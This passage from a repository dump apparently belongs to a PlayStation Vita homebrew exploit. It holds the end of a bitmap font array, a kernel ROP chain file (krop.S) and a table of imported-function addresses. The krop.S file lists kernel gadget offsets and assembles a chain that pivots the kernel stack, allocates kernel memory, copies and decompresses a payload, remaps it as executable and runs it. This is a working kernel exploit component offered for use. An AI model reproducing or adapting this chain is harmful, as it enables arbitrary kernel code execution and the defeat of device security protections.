 57 | "\xf0\x88\x88\xf0\xa0\x90\x88\x00\x70\x88\x80\x70\x08\x88\x70\x00"
 58 | "\xf8\x20\x20\x20\x20\x20\x20\x00\x88\x88\x88\x88\x88\x88\x70\x00"
 59 | "\x88\x88\x88\x88\x50\x50\x20\x00\x88\x88\x88\xa8\xa8\xd8\x88\x00"
 60 | "\x88\x88\x50\x20\x50\x88\x88\x00\x88\x88\x88\x70\x20\x20\x20\x00"
 61 | "\xf8\x08\x10\x20\x40\x80\xf8\x00\x70\x40\x40\x40\x40\x40\x70\x00"
 62 | "\x00\x00\x80\x40\x20\x10\x08\x00\x70\x10\x10\x10\x10\x10\x70\x00"
 63 | "\x20\x50\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00"
 64 | "\x40\x20\x10\x00\x00\x00\x00\x00\x00\x00\x70\x08\x78\x88\x78\x00"
 65 | "\x80\x80\xb0\xc8\x88\xc8\xb0\x00\x00\x00\x70\x88\x80\x88\x70\x00"
 66 | "\x08\x08\x68\x98\x88\x98\x68\x00\x00\x00\x70\x88\xf8\x80\x70\x00"
 67 | "\x10\x28\x20\xf8\x20\x20\x20\x00\x00\x00\x68\x98\x98\x68\x08\x70"
 68 | "\x80\x80\xf0\x88\x88\x88\x88\x00\x20\x00\x60\x20\x20\x20\x70\x00"
 69 | "\x10\x00\x30\x10\x10\x10\x90\x60\x40\x40\x48\x50\x60\x50\x48\x00"
 70 | "\x60\x20\x20\x20\x20\x20\x70\x00\x00\x00\xd0\xa8\xa8\xa8\xa8\x00"
 71 | "\x00\x00\xb0\xc8\x88\x88\x88\x00\x00\x00\x70\x88\x88\x88\x70\x00"
 72 | "\x00\x00\xb0\xc8\xc8\xb0\x80\x80\x00\x00\x68\x98\x98\x68\x08\x08"
 73 | "\x00\x00\xb0\xc8\x80\x80\x80\x00\x00\x00\x78\x80\xf0\x08\xf0\x00"
 74 | "\x40\x40\xf0\x40\x40\x48\x30\x00\x00\x00\x90\x90\x90\x90\x68\x00"
 75 | "\x00\x00\x88\x88\x88\x50\x20\x00\x00\x00\x88\xa8\xa8\xa8\x50\x00"
 76 | "\x00\x00\x88\x50\x20\x50\x88\x00\x00\x00\x88\x88\x98\x68\x08\x70"
 77 | "\x00\x00\xf8\x10\x20\x40\xf8\x00\x18\x20\x20\x40\x20\x20\x18\x00"
 78 | "\x20\x20\x20\x00\x20\x20\x20\x00\xc0\x20\x20\x10\x20\x20\xc0\x00"
 79 | "\x40\xa8\x10\x00\x00\x00\x00\x00\x00\x00\x20\x50\xf8\x00\x00\x00"
 80 | "\x70\x88\x80\x80\x88\x70\x20\x60\x90\x00\x00\x90\x90\x90\x68\x00"
 81 | "\x10\x20\x70\x88\xf8\x80\x70\x00\x20\x50\x70\x08\x78\x88\x78\x00"
 82 | "\x48\x00\x70\x08\x78\x88\x78\x00\x20\x10\x70\x08\x78\x88\x78\x00"
 83 | "\x20\x00\x70\x08\x78\x88\x78\x00\x00\x70\x80\x80\x80\x70\x10\x60"
 84 | "\x20\x50\x70\x88\xf8\x80\x70\x00\x50\x00\x70\x88\xf8\x80\x70\x00"
 85 | "\x20\x10\x70\x88\xf8\x80\x70\x00\x50\x00\x00\x60\x20\x20\x70\x00"
 86 | "\x20\x50\x00\x60\x20\x20\x70\x00\x40\x20\x00\x60\x20\x20\x70\x00"
 87 | "\x50\x00\x20\x50\x88\xf8\x88\x00\x20\x00\x20\x50\x88\xf8\x88\x00"
 88 | "\x10\x20\xf8\x80\xf0\x80\xf8\x00\x00\x00\x6c\x12\x7e\x90\x6e\x00"
 89 | "\x3e\x50\x90\x9c\xf0\x90\x9e\x00\x60\x90\x00\x60\x90\x90\x60\x00"
 90 | "\x90\x00\x00\x60\x90\x90\x60\x00\x40\x20\x00\x60\x90\x90\x60\x00"
 91 | "\x40\xa0\x00\xa0\xa0\xa0\x50\x00\x40\x20\x00\xa0\xa0\xa0\x50\x00"
 92 | "\x90\x00\x90\x90\xb0\x50\x10\xe0\x50\x00\x70\x88\x88\x88\x70\x00"
 93 | "\x50\x00\x88\x88\x88\x88\x70\x00\x20\x20\x78\x80\x80\x78\x20\x20"
 94 | "\x18\x24\x20\xf8\x20\xe2\x5c\x00\x88\x50\x20\xf8\x20\xf8\x20\x00"
 95 | "\xc0\xa0\xa0\xc8\x9c\x88\x88\x8c\x18\x20\x20\xf8\x20\x20\x20\x40"
 96 | "\x10\x20\x70\x08\x78\x88\x78\x00\x10\x20\x00\x60\x20\x20\x70\x00"
 97 | "\x20\x40\x00\x60\x90\x90\x60\x00\x20\x40\x00\x90\x90\x90\x68\x00"
 98 | "\x50\xa0\x00\xa0\xd0\x90\x90\x00\x28\x50\x00\xc8\xa8\x98\x88\x00"
 99 | "\x00\x70\x08\x78\x88\x78\x00\xf8\x00\x60\x90\x90\x90\x60\x00\xf0"
100 | "\x20\x00\x20\x40\x80\x88\x70\x00\x00\x00\x00\xf8\x80\x80\x00\x00"
101 | "\x00\x00\x00\xf8\x08\x08\x00\x00\x84\x88\x90\xa8\x54\x84\x08\x1c"
102 | "\x84\x88\x90\xa8\x58\xa8\x3c\x08\x20\x00\x00\x20\x20\x20\x20\x00"
103 | "\x00\x00\x24\x48\x90\x48\x24\x00\x00\x00\x90\x48\x24\x48\x90\x00"
104 | "\x28\x50\x20\x50\x88\xf8\x88\x00\x28\x50\x70\x08\x78\x88\x78\x00"
105 | "\x28\x50\x00\x70\x20\x20\x70\x00\x28\x50\x00\x20\x20\x20\x70\x00"
106 | "\x28\x50\x00\x70\x88\x88\x70\x00\x50\xa0\x00\x60\x90\x90\x60\x00"
107 | "\x28\x50\x00\x88\x88\x88\x70\x00\x50\xa0\x00\xa0\xa0\xa0\x50\x00"
108 | "\xfc\x48\x48\x48\xe8\x08\x50\x20\x00\x50\x00\x50\x50\x50\x10\x20"
109 | "\xc0\x44\xc8\x54\xec\x54\x9e\x04\x10\xa8\x40\x00\x00\x00\x00\x00"
110 | "\x00\x20\x50\x88\x50\x20\x00\x00\x88\x10\x20\x40\x80\x28\x00\x00"
111 | "\x7c\xa8\xa8\x68\x28\x28\x28\x00\x38\x40\x30\x48\x48\x30\x08\x70"
112 | "\x00\x00\x00\x00\x00\x00\xff\xff\xf0\xf0\xf0\xf0\x0f\x0f\x0f\x0f"
113 | "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00"
114 | "\x00\x00\x00\x3c\x3c\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00"
115 | "\xc0\xc0\xc0\xc0\xc0\xc0\xc0\xc0\x0f\x0f\x0f\x0f\xf0\xf0\xf0\xf0"
116 | "\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\x03\x03\x03\x03\x03\x03\x03\x03"
117 | "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x11\x22\x44\x88\x11\x22\x44\x88"
118 | "\x88\x44\x22\x11\x88\x44\x22\x11\xfe\x7c\x38\x10\x00\x00\x00\x00"
119 | "\x00\x00\x00\x00\x10\x38\x7c\xfe\x80\xc0\xe0\xf0\xe0\xc0\x80\x00"
120 | "\x01\x03\x07\x0f\x07\x03\x01\x00\xff\x7e\x3c\x18\x18\x3c\x7e\xff"
121 | "\x81\xc3\xe7\xff\xff\xe7\xc3\x81\xf0\xf0\xf0\xf0\x00\x00\x00\x00"
122 | "\x00\x00\x00\x00\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x00\x00\x00\x00"
123 | "\x00\x00\x00\x00\xf0\xf0\xf0\xf0\x33\x33\xcc\xcc\x33\x33\xcc\xcc"
124 | "\x00\x20\x20\x50\x50\x88\xf8\x00\x20\x20\x70\x20\x70\x20\x20\x00"
125 | "\x00\x00\x00\x50\x88\xa8\x50\x00\xff\xff\xff\xff\xff\xff\xff\xff"
126 | "\x00\x00\x00\x00\xff\xff\xff\xff\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0"
127 | "\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\xff\xff\xff\xff\x00\x00\x00\x00"
128 | "\x00\x00\x68\x90\x90\x90\x68\x00\x30\x48\x48\x70\x48\x48\x70\xc0"
129 | "\xf8\x88\x80\x80\x80\x80\x80\x00\xf8\x50\x50\x50\x50\x50\x98\x00"
130 | "\xf8\x88\x40\x20\x40\x88\xf8\x00\x00\x00\x78\x90\x90\x90\x60\x00"
131 | "\x00\x50\x50\x50\x50\x68\x80\x80\x00\x50\xa0\x20\x20\x20\x20\x00"
132 | "\xf8\x20\x70\xa8\xa8\x70\x20\xf8\x20\x50\x88\xf8\x88\x50\x20\x00"
133 | "\x70\x88\x88\x88\x50\x50\xd8\x00\x30\x40\x40\x20\x50\x50\x50\x20"
134 | "\x00\x00\x00\x50\xa8\xa8\x50\x00\x08\x70\xa8\xa8\xa8\x70\x80\x00"
135 | "\x38\x40\x80\xf8\x80\x40\x38\x00\x70\x88\x88\x88\x88\x88\x88\x00"
136 | "\x00\xf8\x00\xf8\x00\xf8\x00\x00\x20\x20\xf8\x20\x20\x00\xf8\x00"
137 | "\xc0\x30\x08\x30\xc0\x00\xf8\x00\x18\x60\x80\x60\x18\x00\xf8\x00"
138 | "\x10\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xa0\x40"
139 | "\x00\x20\x00\xf8\x00\x20\x00\x00\x00\x50\xa0\x00\x50\xa0\x00\x00"
140 | "\x00\x18\x24\x24\x18\x00\x00\x00\x00\x30\x78\x78\x30\x00\x00\x00"
141 | "\x00\x00\x00\x00\x30\x00\x00\x00\x3e\x20\x20\x20\xa0\x60\x20\x00"
142 | "\xa0\x50\x50\x50\x00\x00\x00\x00\x40\xa0\x20\x40\xe0\x00\x00\x00"
143 | "\x00\x38\x38\x38\x38\x38\x38\x00\x00\x00\x00\x00\x00\x00\x00";
144 | 
145 | 
146 | 
147 | 


--------------------------------------------------------------------------------
/stage2/krop.S:
--------------------------------------------------------------------------------
  1 | /* krop.S -- kernel rop chain
  2 |  *
  3 |  * Copyright (C) 2018 TheFloW
  4 |  *
  5 |  * This software may be modified and distributed under the terms
  6 |  * of the MIT license.  See the LICENSE file for details.
  7 |  */
  8 | 
  9 | // Kernel offsets
 10 | .equ KSTACK_SIZE,                                 0x1000
 11 | .equ KSTACK_DEVCTL_INDATA_OFFSET,                 0x6f8
 12 | .equ KSTACK_SYSMEM_OFFSET,                        0x89c
 13 | .equ SCE_SYSMEM_OFFSET,                           -0x1697
 14 | 
 15 | // call
 16 | .equ SceSysmem_blx_r0,                            0x1fb3f
 17 | .equ SceSysmem_blx_r4_pop_r4_pc,                  0x19fb9
 18 | 
 19 | // load
 20 | .equ SceSysmem_pop_pc,                            0x347
 21 | .equ SceSysmem_pop_r0_r1_pc,                      0x853
 22 | .equ SceSysmem_pop_r0_r1_r2_r3_r4_pc,             0x258bd
 23 | .equ SceSysmem_pop_r1_r2_r4_r6_pc,                0x288ff
 24 | .equ SceSysmem_pop_r3_pc,                         0x1d8f
 25 | .equ SceSysmem_pop_r3_r4_r5_pc,                   0x1377
 26 | .equ SceSysmem_pop_r3_r4_r5_r6_r7_pc,             0xf59
 27 | .equ SceSysmem_ldr_r0_r0_blx_r3,                  0x11337
 28 | .equ SceSysmem_ldr_r2_r5_14_blx_r3,               0x1f697
 29 | 
 30 | // store
 31 | .equ SceSysmem_str_r0_r4_movs_r0_0_pop_r4_pc,     0x4f71
 32 | 
 33 | // move
 34 | .equ SceSysmem_mov_sp_r1_blx_r2,                  0x67
 35 | 
 36 | // arithmetic
 37 | .equ SceSysmem_adds_r0_1_bx_lr,                   0x533b
 38 | .equ SceSysmem_add_r1_sp_bc_mov_r2_r6_blx_r3,     0x1d97d
 39 | .equ SceSysmem_sub_r1_r1_r3_bx_lr,                0x86d
 40 | 
 41 | // functions
 42 | .equ SceSysmem_ksceKernelGetMemBlockBase,         0x5849
 43 | .equ SceSysmem_ksceKernelAllocMemBlock,           0x7d3d
 44 | .equ SceSysmem_ksceKernelRemapBlock,              0x7f69
 45 | .equ SceSysmem_ksceKernelFreeMemBlock,            0x825d
 46 | .equ SceSysmem_ksceDeflateDecompress,             0x1c3bb
 47 | .equ SceSysmem_ksceKernelMemcpyUserToKernel,      0x6289
 48 | .equ SceSysmem_ksceKernelCpuDcacheWritebackRange, 0x22fcd
 49 | 
 50 | // misc
 51 | .equ SceSysmem_empty_string,                      0x19
 52 | 
 53 | // Variables that lie in the kernel stack
 54 | .equ payload_temp_block,                          0x00
 55 | .equ payload_temp_blockid,                        0x04
 56 | .equ payload_code_block,                          0x08
 57 | .equ payload_code_blockid,                        0x0c
 58 | 
 59 | // Max decompressed payload size
 60 | .equ PAYLOAD_DECOMPRESSED_SIZE,                   0x100000
 61 | 
 62 | .macro init_krop dst
 63 |   .set krop_chain, \dst
 64 | .endm
 65 | 
 66 | .macro push base, gadget
 67 |   .if \base == 0
 68 |     store_vv \gadget, krop_chain
 69 |   .elseif \base == 1
 70 |     load_add_store krop_chain, sysmem_base, \gadget
 71 |   .elseif \base == 2
 72 |     load_add_store krop_chain, kstack_base, \gadget
 73 |   .elseif \base == 9
 74 |     // Dummy
 75 |   .endif
 76 |   .set krop_chain, krop_chain + 4
 77 | .endm
 78 | 
 79 | .macro build_krop dst
 80 |   // Init krop chain
 81 |   init_krop \dst
 82 | 
 83 |   // Allocate temporary block
 84 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
 85 |   push 1, SceSysmem_empty_string                      // r0
 86 |   push 0, SCE_KERNEL_MEMBLOCK_TYPE_KERNEL_RW          // r1
 87 |   push 0, (payload_size + 0xfff) & ~0xfff             // r2
 88 |   push 0, NULL                                        // r3
 89 |   push 1, SceSysmem_ksceKernelAllocMemBlock           // r4
 90 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // pc
 91 |   push 2, payload_temp_blockid                        // r4
 92 |   push 1, SceSysmem_str_r0_r4_movs_r0_0_pop_r4_pc     // pc
 93 |   push 9, 0xDEADBEEF                                  // r4
 94 | 
 95 |   // Get temporary block
 96 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
 97 |   push 2, payload_temp_blockid                        // r0
 98 |   push 2, payload_temp_block                          // r1
 99 |   push 9, 0xDEADBEEF                                  // r2
100 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
101 |   push 1, SceSysmem_ksceKernelGetMemBlockBase         // r4
102 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
103 |   push 9, 0xDEADBEEF                                  // r4
104 | 
105 |   // Allocate code block
106 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
107 |   push 1, SceSysmem_empty_string                      // r0
108 |   push 0, SCE_KERNEL_MEMBLOCK_TYPE_KERNEL_RW          // r1
109 |   push 0, PAYLOAD_DECOMPRESSED_SIZE                   // r2
110 |   push 0, NULL                                        // r3
111 |   push 1, SceSysmem_ksceKernelAllocMemBlock           // r4
112 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // pc
113 |   push 2, payload_code_blockid                        // r4
114 |   push 1, SceSysmem_str_r0_r4_movs_r0_0_pop_r4_pc     // pc
115 |   push 9, 0xDEADBEEF                                  // r4
116 | 
117 |   // Get code block
118 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
119 |   push 2, payload_code_blockid                        // r0
120 |   push 2, payload_code_block                          // r1
121 |   push 9, 0xDEADBEEF                                  // r2
122 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
123 |   push 1, SceSysmem_ksceKernelGetMemBlockBase         // r4
124 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
125 |   push 9, 0xDEADBEEF                                  // r4
126 | 
127 |   // Copy compressed payload from user to temporary block
128 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
129 |   push 2, payload_temp_block                          // r0
130 |   push 0, payload_start                               // r1
131 |   push 0, payload_size                                // r2
132 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
133 |   push 1, SceSysmem_ksceKernelMemcpyUserToKernel      // r4
134 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
135 |   push 9, 0xDEADBEEF                                  // r4
136 | 
137 |   // Decompress payload to code block
138 |   push 1, SceSysmem_pop_r3_r4_r5_pc                   // pc
139 |   push 1, SceSysmem_pop_pc                            // r3
140 |   push 1, SceSysmem_ksceDeflateDecompress             // r4
141 |   push 2, payload_temp_block - 0x14                   // r5
142 |   push 1, SceSysmem_ldr_r2_r5_14_blx_r3               // pc
143 |   push 1, SceSysmem_pop_r0_r1_pc                      // pc
144 |   push 2, payload_code_block                          // r0
145 |   push 0, PAYLOAD_DECOMPRESSED_SIZE                   // r1
146 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
147 |   push 1, SceSysmem_pop_r3_pc                         // pc
148 |   push 0, NULL                                        // r3
149 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // pc
150 |   push 9, 0xDEADBEEF                                  // r4
151 | 
152 |   // Free temporary block
153 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
154 |   push 2, payload_temp_blockid                        // r0
155 |   push 9, 0xDEADBEEF                                  // r1
156 |   push 9, 0xDEADBEEF                                  // r2
157 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
158 |   push 1, SceSysmem_ksceKernelFreeMemBlock            // r4
159 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
160 |   push 9, 0xDEADBEEF                                  // r4
161 | 
162 |   // Mark code block as executable
163 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
164 |   push 2, payload_code_blockid                        // r0
165 |   push 0, SCE_KERNEL_MEMBLOCK_TYPE_KERNEL_RX          // r1
166 |   push 9, 0xDEADBEEF                                  // r2
167 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
168 |   push 1, SceSysmem_ksceKernelRemapBlock              // r4
169 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
170 |   push 9, 0xDEADBEEF                                  // r4
171 | 
172 |   // Clean cache
173 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
174 |   push 2, payload_code_block                          // r0
175 |   push 0, PAYLOAD_DECOMPRESSED_SIZE                   // r1
176 |   push 9, 0xDEADBEEF                                  // r2
177 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
178 |   push 1, SceSysmem_ksceKernelCpuDcacheWritebackRange // r4
179 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
180 |   push 9, 0xDEADBEEF                                  // r4
181 | 
182 |   // Execute payload
183 |   push 1, SceSysmem_pop_r0_r1_r2_r3_r4_pc             // pc
184 |   push 2, payload_code_block                          // r0
185 |   push 1, 0                                           // r1
186 |   push 0, framebuf                                    // r2
187 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // r3
188 |   push 1, SceSysmem_adds_r0_1_bx_lr                   // r4
189 |   push 1, SceSysmem_ldr_r0_r0_blx_r3                  // pc
190 |   push 9, 0xDEADBEEF                                  // r4
191 |   push 1, SceSysmem_blx_r0                            // pc
192 | .endm
193 | 
194 | .macro build_pivot_krop dst
195 |   // Init krop chain
196 |   init_krop \dst
197 | 
198 |   // Kernel stack pivot
199 |   .set difference, (KSTACK_SIZE - OVERWRITE_SIZE) - KSTACK_DEVCTL_INDATA_OFFSET
200 |   push 1, SceSysmem_pop_r3_r4_r5_r6_r7_pc             // pc
201 |   push 1, SceSysmem_pop_r3_pc                         // r3
202 |   push 1, SceSysmem_sub_r1_r1_r3_bx_lr                // r4
203 |   push 9, 0xDEADBEEF                                  // r5
204 |   push 1, SceSysmem_pop_pc                            // r6
205 |   push 9, 0xDEADBEEF                                  // r7
206 |   push 1, SceSysmem_add_r1_sp_bc_mov_r2_r6_blx_r3     // pc
207 |   push 0, 0x1c + 0xbc + difference                    // r3
208 |   push 1, SceSysmem_blx_r4_pop_r4_pc                  // pc
209 |   push 9, 0xDEADBEEF                                  // r4
210 |   push 1, SceSysmem_mov_sp_r1_blx_r2                  // pc
211 | .endm
212 | 


--------------------------------------------------------------------------------
/include/functions.S:
--------------------------------------------------------------------------------
  1 | /* functions.S -- imported functions
  2 |  *
  3 |  * Copyright (C) 2018 TheFloW
  4 |  *
  5 |  * This software may be modified and distributed under the terms
  6 |  * of the MIT license.  See the LICENSE file for details.
  7 |  */
  8 | 
  9 | // SceJpegUser
 10 | .equ sceJpegDecodeMJpegYCbCr, 0x8102f294
 11 | .equ sceJpegGetOutputInfo, 0x8102f2a4
 12 | .equ sceJpegInitMJpegWithParam, 0x8102f2b4
 13 | .equ sceJpegCsc, 0x8102f2c4
 14 | .equ sceJpegFinishMJpeg, 0x8102f2d4
 15 | .equ sceJpegMJpegCsc, 0x8102f2e4
 16 | 
 17 | // SceJpegEncUser
 18 | .equ sceJpegEncoderSetOutputAddr, 0x8102f2f4
 19 | .equ sceJpegEncoderGetContextSize, 0x8102f304
 20 | .equ sceJpegEncoderInitWithParam, 0x8102f314
 21 | .equ sceJpegEncoderCsc, 0x8102f324
 22 | .equ sceJpegEncoderSetValidRegion, 0x8102f334
 23 | .equ sceJpegEncoderSetCompressionRatio, 0x8102f344
 24 | .equ sceJpegEncoderEncode, 0x8102f354
 25 | .equ sceJpegEncoderEnd, 0x8102f364
 26 | 
 27 | // SceGxm
 28 | .equ sceGxmMapFragmentUsseMemory, 0x8102f374
 29 | .equ sceGxmShaderPatcherCreate, 0x8102f384
 30 | .equ sceGxmFinish, 0x8102f394
 31 | .equ sceGxmUnmapVertexUsseMemory, 0x8102f3a4
 32 | .equ sceGxmDestroyRenderTarget, 0x8102f3b4
 33 | .equ sceGxmTextureGetWidth, 0x8102f3c4
 34 | .equ sceGxmTextureSetVAddrMode, 0x8102f3d4
 35 | .equ sceGxmSetFrontDepthFunc, 0x8102f3e4
 36 | .equ sceGxmTextureSetMipFilter, 0x8102f3f4
 37 | .equ sceGxmCreateRenderTarget, 0x8102f404
 38 | .equ sceGxmProgramFindParameterByName, 0x8102f414
 39 | .equ sceGxmSetFragmentTexture, 0x8102f424
 40 | .equ sceGxmShaderPatcherRegisterProgram, 0x8102f434
 41 | .equ sceGxmSetVertexProgram, 0x8102f444
 42 | .equ sceGxmTextureSetMinFilter, 0x8102f454
 43 | .equ sceGxmTextureSetUAddrMode, 0x8102f464
 44 | .equ sceGxmTransferFinish, 0x8102f474
 45 | .equ sceGxmTextureInitLinear, 0x8102f484
 46 | .equ sceGxmShaderPatcherCreateFragmentProgram, 0x8102f494
 47 | .equ sceGxmTextureGetData, 0x8102f4a4
 48 | .equ sceGxmTextureGetHeight, 0x8102f4b4
 49 | .equ sceGxmProgramParameterGetResourceIndex, 0x8102f4c4
 50 | .equ sceGxmTransferCopy, 0x8102f4d4
 51 | .equ sceGxmSetUniformDataF, 0x8102f4e4
 52 | .equ sceGxmTextureInitLinearStrided, 0x8102f4f4
 53 | .equ sceGxmTransferFill, 0x8102f504
 54 | .equ sceGxmSyncObjectCreate, 0x8102f514
 55 | .equ sceGxmReserveFragmentDefaultUniformBuffer, 0x8102f524
 56 | .equ sceGxmUnmapFragmentUsseMemory, 0x8102f534
 57 | .equ sceGxmUnmapMemory, 0x8102f544
 58 | .equ sceGxmBeginScene, 0x8102f554
 59 | .equ sceGxmSyncObjectDestroy, 0x8102f564
 60 | .equ sceGxmSetVertexStream, 0x8102f574
 61 | .equ sceGxmShaderPatcherGetProgramFromId, 0x8102f584
 62 | .equ sceGxmShaderPatcherReleaseVertexProgram, 0x8102f594
 63 | .equ sceGxmSetFragmentProgram, 0x8102f5a4
 64 | .equ sceGxmSetBackDepthFunc, 0x8102f5b4
 65 | .equ sceGxmInitialize, 0x8102f5c4
 66 | .equ sceGxmTerminate, 0x8102f5d4
 67 | .equ sceGxmShaderPatcherCreateVertexProgram, 0x8102f5e4
 68 | .equ sceGxmDisplayQueueFinish, 0x8102f5f4
 69 | .equ sceGxmDraw, 0x8102f604
 70 | .equ sceGxmShaderPatcherReleaseFragmentProgram, 0x8102f614
 71 | .equ sceGxmMapMemory, 0x8102f624
 72 | .equ sceGxmDepthStencilSurfaceInit, 0x8102f634
 73 | .equ sceGxmTransferDownscale, 0x8102f644
 74 | .equ sceGxmCreateContext, 0x8102f654
 75 | .equ sceGxmShaderPatcherDestroy, 0x8102f664
 76 | .equ sceGxmDisplayQueueAddEntry, 0x8102f674
 77 | .equ sceGxmColorSurfaceInit, 0x8102f684
 78 | .equ sceGxmDestroyContext, 0x8102f694
 79 | .equ sceGxmShaderPatcherUnregisterProgram, 0x8102f6a4
 80 | .equ sceGxmMapVertexUsseMemory, 0x8102f6b4
 81 | .equ sceGxmTextureSetMagFilter, 0x8102f6c4
 82 | .equ sceGxmEndScene, 0x8102f6d4
 83 | 
 84 | // SceDisplayUser
 85 | .equ sceDisplaySetFrameBuf, 0x8102f6e4
 86 | 
 87 | // SceDisplay
 88 | .equ sceDisplayWaitVblankStart, 0x8102f6f4
 89 | .equ sceDisplayWaitSetFrameBufMulti, 0x8102f704
 90 | .equ sceDisplayWaitSetFrameBuf, 0x8102f714
 91 | 
 92 | // SceCtrl
 93 | .equ sceCtrlReadBufferPositive, 0x8102f724
 94 | .equ sceCtrlSetSamplingMode, 0x8102f734
 95 | 
 96 | // SceAtrac
 97 | .equ sceAtracReleaseHandle, 0x8102f744
 98 | .equ sceAtracCreateDecoderGroup, 0x8102f754
 99 | .equ sceAtracSetOutputSamples, 0x8102f764
100 | .equ sceAtracQueryDecoderGroupMemSize, 0x8102f774
101 | .equ sceAtracSetSubBuffer, 0x8102f784
102 | .equ sceAtracDecode, 0x8102f794
103 | .equ sceAtracAddStreamData, 0x8102f7a4
104 | .equ sceAtracSetLoopNum, 0x8102f7b4
105 | .equ sceAtracGetContentInfo, 0x8102f7c4
106 | .equ sceAtracDeleteDecoderGroup, 0x8102f7d4
107 | .equ sceAtracIsSubBufferNeeded, 0x8102f7e4
108 | .equ sceAtracGetNextOutputPosition, 0x8102f7f4
109 | .equ sceAtracSetDataAndAcquireHandle, 0x8102f804
110 | .equ sceAtracResetNextOutputPosition, 0x8102f814
111 | .equ sceAtracGetStreamInfo, 0x8102f824
112 | .equ sceAtracGetSubBufferInfo, 0x8102f834
113 | 
114 | // SceAudio
115 | .equ sceAudioOutOutput, 0x8102f844
116 | .equ sceAudioOutOpenPort, 0x8102f854
117 | .equ sceAudioOutSetVolume, 0x8102f864
118 | .equ sceAudioOutReleasePort, 0x8102f874
119 | 
120 | // SceSysmodule
121 | .equ sceSysmoduleUnloadModule, 0x8102f884
122 | .equ sceSysmoduleLoadModule, 0x8102f894
123 | 
124 | // SceRtcUser
125 | .equ sceRtcGetCurrentClockLocalTime, 0x8102f8a4
126 | 
127 | // ScePvf
128 | .equ scePvfFindOptimumFont, 0x8102f8b4
129 | .equ scePvfSetSkewValue, 0x8102f8c4
130 | .equ scePvfSetEmboldenRate, 0x8102f8d4
131 | .equ scePvfNewLib, 0x8102f8e4
132 | .equ scePvfGetCharGlyphImage_Clip, 0x8102f8f4
133 | .equ scePvfGetCharInfo, 0x8102f904
134 | .equ scePvfGetFontInfo, 0x8102f914
135 | .equ scePvfSetResolution, 0x8102f924
136 | .equ scePvfClose, 0x8102f934
137 | .equ scePvfSetEM, 0x8102f944
138 | .equ scePvfDoneLib, 0x8102f954
139 | .equ scePvfOpen, 0x8102f964
140 | .equ scePvfSetCharSize, 0x8102f974
141 | 
142 | // SceTouch
143 | .equ sceTouchRead, 0x8102f984
144 | .equ sceTouchSetSamplingState, 0x8102f994
145 | 
146 | // SceSystemGesture
147 | .equ sceSystemGestureGetTouchEventsCount, 0x8102f9a4
148 | .equ sceSystemGestureGetTouchEventByEventID, 0x8102f9b4
149 | .equ sceSystemGestureInitializePrimitiveTouchRecognizer, 0x8102f9c4
150 | .equ sceSystemGestureGetTouchEventByIndex, 0x8102f9d4
151 | .equ sceSystemGestureUpdateTouchRecognizer, 0x8102f9e4
152 | .equ sceSystemGestureFinalizePrimitiveTouchRecognizer, 0x8102f9f4
153 | .equ sceSystemGestureCreateTouchRecognizer, 0x8102fa04
154 | .equ sceSystemGestureUpdatePrimitiveTouchRecognizer, 0x8102fa14
155 | 
156 | // SceAppUtil
157 | .equ sceAppUtilSaveDataDataSave, 0x8102fa24
158 | .equ sceAppUtilSaveDataSlotGetParam, 0x8102fa34
159 | .equ sceAppUtilShutdown, 0x8102fa44
160 | .equ sceAppUtilSaveDataDataRemove, 0x8102fa54
161 | .equ sceAppUtilInit, 0x8102fa64
162 | 
163 | // SceCommonDialog
164 | .equ sceSaveDataDialogContinue, 0x8102fa74
165 | .equ sceSaveDataDialogTerm, 0x8102fa84
166 | .equ sceMsgDialogGetStatus, 0x8102fa94
167 | .equ sceSaveDataDialogSubClose, 0x8102faa4
168 | .equ sceSaveDataDialogFinish, 0x8102fab4
169 | .equ sceSaveDataDialogGetStatus, 0x8102fac4
170 | .equ sceMsgDialogInit, 0x8102fad4
171 | .equ sceMsgDialogTerm, 0x8102fae4
172 | .equ sceCommonDialogUpdate, 0x8102faf4
173 | .equ sceNpTrophySetupDialogInit, 0x8102fb04
174 | .equ sceNpTrophySetupDialogTerm, 0x8102fb14
175 | .equ sceSaveDataDialogGetResult, 0x8102fb24
176 | .equ sceSaveDataDialogGetSubStatus, 0x8102fb34
177 | .equ sceMsgDialogGetResult, 0x8102fb44
178 | .equ sceSaveDataDialogInit, 0x8102fb54
179 | .equ sceMsgDialogClose, 0x8102fb64
180 | .equ sceNpTrophySetupDialogGetStatus, 0x8102fb74
181 | .equ sceNpTrophySetupDialogGetResult, 0x8102fb84
